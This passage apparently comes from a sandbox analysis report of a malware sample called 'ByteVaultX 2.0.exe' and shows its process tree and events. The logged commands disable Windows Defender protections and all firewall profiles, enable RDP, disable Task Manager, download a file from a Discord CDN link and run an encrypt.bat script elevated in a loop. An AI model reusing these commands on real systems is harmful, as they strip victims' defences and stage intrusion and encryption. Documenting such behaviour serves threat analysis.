powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe 2640 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1100 wrote to memory of 4228 1100 ByteVaultX 2.0.exe 77 PID 1100 wrote to memory of 4228 1100 ByteVaultX 2.0.exe 77 PID 4228 wrote to memory of 4844 4228 ByteVaultX 2.0.exe 78 PID 4228 wrote to memory of 4844 4228 ByteVaultX 2.0.exe 78 PID 4228 wrote to memory of 2932 4228 ByteVaultX 2.0.exe 80 PID 4228 wrote to memory of 2932 4228 ByteVaultX 2.0.exe 80 PID 4228 wrote to memory of 1580 4228 ByteVaultX 2.0.exe 83 PID 4228 wrote to memory of 1580 4228 ByteVaultX 2.0.exe 83 PID 4228 wrote to memory of 2640 4228 ByteVaultX 2.0.exe 85 PID 4228 wrote to memory of 2640 4228 ByteVaultX 2.0.exe 85 PID 2640 wrote to memory of 3780 2640 msedge.exe 86 PID 2640 wrote to memory of 3780 2640 msedge.exe 86 PID 4228 wrote to memory of 3252 4228 ByteVaultX 2.0.exe 87 PID 4228 wrote to memory of 3252 4228 ByteVaultX 2.0.exe 87 PID 3252 wrote to memory of 3008 3252 cmd.exe 89 PID 3252 wrote to memory of 3008 3252 cmd.exe 89 PID 3252 wrote to memory of 4796 3252 cmd.exe 90 PID 3252 wrote to memory of 4796 3252 cmd.exe 90 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 3504 2640 msedge.exe 91 PID 2640 wrote to memory of 1956 2640 msedge.exe 92 PID 2640 wrote to memory of 1956 2640 msedge.exe 92 PID 2640 wrote to memory of 1684 2640 msedge.exe 93 PID 2640 wrote to memory of 1684 2640 msedge.exe 93 PID 2640 wrote to memory of 1684 2640 msedge.exe 93 PID 2640 wrote to memory of 1684 2640 msedge.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵PID:2932
-
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff979d33cb8,0x7ff979d33cc8,0x7ff979d33cd84⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:24⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:84⤵PID:1684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:14⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:14⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:14⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:14⤵PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:14⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:14⤵PID:352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5544 /prefetch:24⤵PID:4776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:3008
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:4796
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:1700
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:3268
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵PID:2424
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵
- Modifies Windows Firewall
PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵
- Modifies Windows Firewall
PID:1156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵PID:1008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵PID:4188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:628
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:248
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:3940
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:2788
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵PID:1092
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵PID:2752
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵PID:3732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵PID:3808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:1808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:2300
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:3184
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:2412
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:4916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:3704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
PID:4300
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵PID:4864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵PID:3564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵PID:1332
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵PID:4800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:4524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2508 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:2528
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:3940
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:2220
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:4568
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵PID:3568
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵PID:3172
-
-
